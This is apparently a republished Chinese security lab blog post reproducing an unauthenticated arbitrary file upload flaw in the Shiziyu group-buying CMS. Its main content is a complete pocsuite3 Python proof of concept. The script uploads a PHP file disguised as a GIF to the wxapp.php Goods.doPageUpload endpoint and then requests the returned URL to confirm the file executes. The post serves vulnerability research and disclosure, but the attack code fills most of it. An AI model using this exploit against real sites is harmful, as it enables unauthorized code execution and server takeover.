暂无图片
暂无图片
1
暂无图片
暂无图片
暂无图片
首页 / 【漏洞复现】狮子鱼CMS任意文件上传漏洞——燕云实验室

【漏洞复现】狮子鱼CMS任意文件上传漏洞——燕云实验室

燕云实验室 2021-06-28
8850


“燕云实验室”是河北千诚电子科技有限公司成立的网络安全攻防技术研究实验室。主要研究方向为渗透测试、代码审计、逆向分析、漏洞研究、CTF对抗、威胁情报、应急响应等。



漏洞描述



狮子鱼CMS wxapp.php 文件存在任意文件上传漏洞,攻击者可以无身份验证上传恶意文件。



漏洞版本



狮子鱼社团团购系统CMS



漏洞复现







POC



    #!/usr/bin/env python
    # coding: utf-8
    from urllib.parse import urlparse
    from pocsuite3.api import requests as req
    from pocsuite3.api import register_poc
    from pocsuite3.api import Output, POCBase
    from pocsuite3.api import POC_CATEGORY, VUL_TYPE    
    import hashlib
    import random
    import string


    class TestPOC(POCBase):
        vulID = '67'
        version = '1'
        author = 'zhzyker'
        vulDate = '2015-06-14'
        createDate = '2021-06-14'
        updateDate = '2021-06-14'
        references = ['https://github.com/zhzyker/vulmap']
        name = 'shiziyu CMS wxapp.php arbitrary file upload vulnerability'
        appName = 'Shiziyu CMS'
        appVersion = 'unknow'
        vulType = VUL_TYPE.CODE_EXECUTION
        category = POC_CATEGORY.EXPLOITS.REMOTE
        desc = '''
            shiziyu CMS wxapp.php arbitrary file upload vulnerability
        '''


        def _verify(self):
            result = {}
            pr = urlparse(self.url)
            if pr.port:
                ports = [pr.port]
            else:
                ports = [8080]
            for port in ports:
                target = '{}://{}:{}'.format(pr.scheme, pr.hostname, port)
                TIMEOUT = 10
                st = ''.join(random.choices(string.ascii_letters+string.digits, k=8))
                md = hashlib.md5("".join(st).encode('utf-8')).hexdigest()
                headers = {
                    'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36',
                    'Content-Type': 'multipart/form-data; boundary=----7d33a816d302b6',
                }
                data = '------7d33a816d302b6\n'
                data += 'Content-Disposition: form-data; name="upfile"; filename="go.php"\n'
                data += 'Content-Type: image/gif\n\n'
                data += md
                data += '\n\n------7d33a816d302b6--'
                    
                try:
                    self.request = req.post(self.url+"/wxapp.php?controller=Goods.doPageUpload", data=data, headers=headers, timeout=TIMEOUT, verify=False)
                    #print(self.request.status_code)
                    resp = self.request.json()
                    shell_url = resp.get('image_o')
                    #print(shell_url)
                    self.request = req.get(shell_url, headers=headers, timeout=TIMEOUT, verify=False)
                    if md in self.request.text and self.request.status_code == 200:
                        result['VerifyInfo'] = {}
                        result['VerifyInfo']['URL'] = self.url
                        result['VerifyInfo']['UPLOAD'] = shell_url
                        break
                except:
                    pass
            return self.parse_output(result)


        def _attack(self):
            return self._verify()


        def parse_output(self, result):
            output = Output(self)
            if result:
                output.success(result)
            else:
                output.fail('not vulnerability')
            return output


    register_poc(TestPOC)




    扫描二维码获取

    更多精彩

    燕云实验室



    数据库
    文章转载自燕云实验室,如果涉嫌侵权,请发送邮件至:contact@modb.pro进行举报,并提供相关证据,一经查实,墨天轮将立刻删除相关内容。

    评论